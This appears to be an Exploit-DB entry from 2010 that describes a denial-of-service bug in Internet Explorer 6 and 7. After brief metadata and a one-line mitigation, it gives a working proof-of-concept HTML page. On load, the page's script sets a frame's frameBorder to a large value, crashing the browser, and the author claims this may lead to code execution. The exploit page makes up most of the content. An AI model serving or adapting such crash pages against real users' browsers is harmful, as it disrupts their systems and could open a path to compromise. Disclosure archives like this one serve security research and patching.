IE6 / 7 Remote Dos vulnerability

vendor:

None

by:

Richard leahy

8,8

CVSS

HIGH

Remote Dos

CWE

Product Name: None

Affected Version From: 6

Affected Version To: 7

Patch Exists: No

Related CWE: None

CPE: None

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows Xp Sp3

2010

IE6 / 7 Remote Dos vulnerability

The vulnerability is caused due to specifying a large value integer or string to the frame.frameBorder causing a dos and may lead to code execution.

Mitigation:

Ensure that the frame.frameBorder value is not set to a large value integer or string.

Source

Exploit-DB raw data:

# Exploit Title: IE6 / 7 Remote Dos vulnerability
# Date: 27/07/2010
# Author: Richard leahy
# Version: 6 / 7
# Tested on: Windows Xp Sp3
#category Remote Dos, might lead to code execution.

# The vulnerability is caused due to specifying a large value integer or string to the frame.frameBorder     
causing a dos and may lead to code execution. 

#code

<html>
<head>
<script>

function dos(){

  var e = document.createElement('frame');
  var prop = 'frameBorder';

  e[prop] = 0123456789;
}

</script>
</head>
<body onload="dos()">
</body>

</html>
 		 	   		  
_________________________________________________________________
Hotmail: Powerful Free email with security by Microsoft.
https://signup.live.com/signup.aspx?id=60969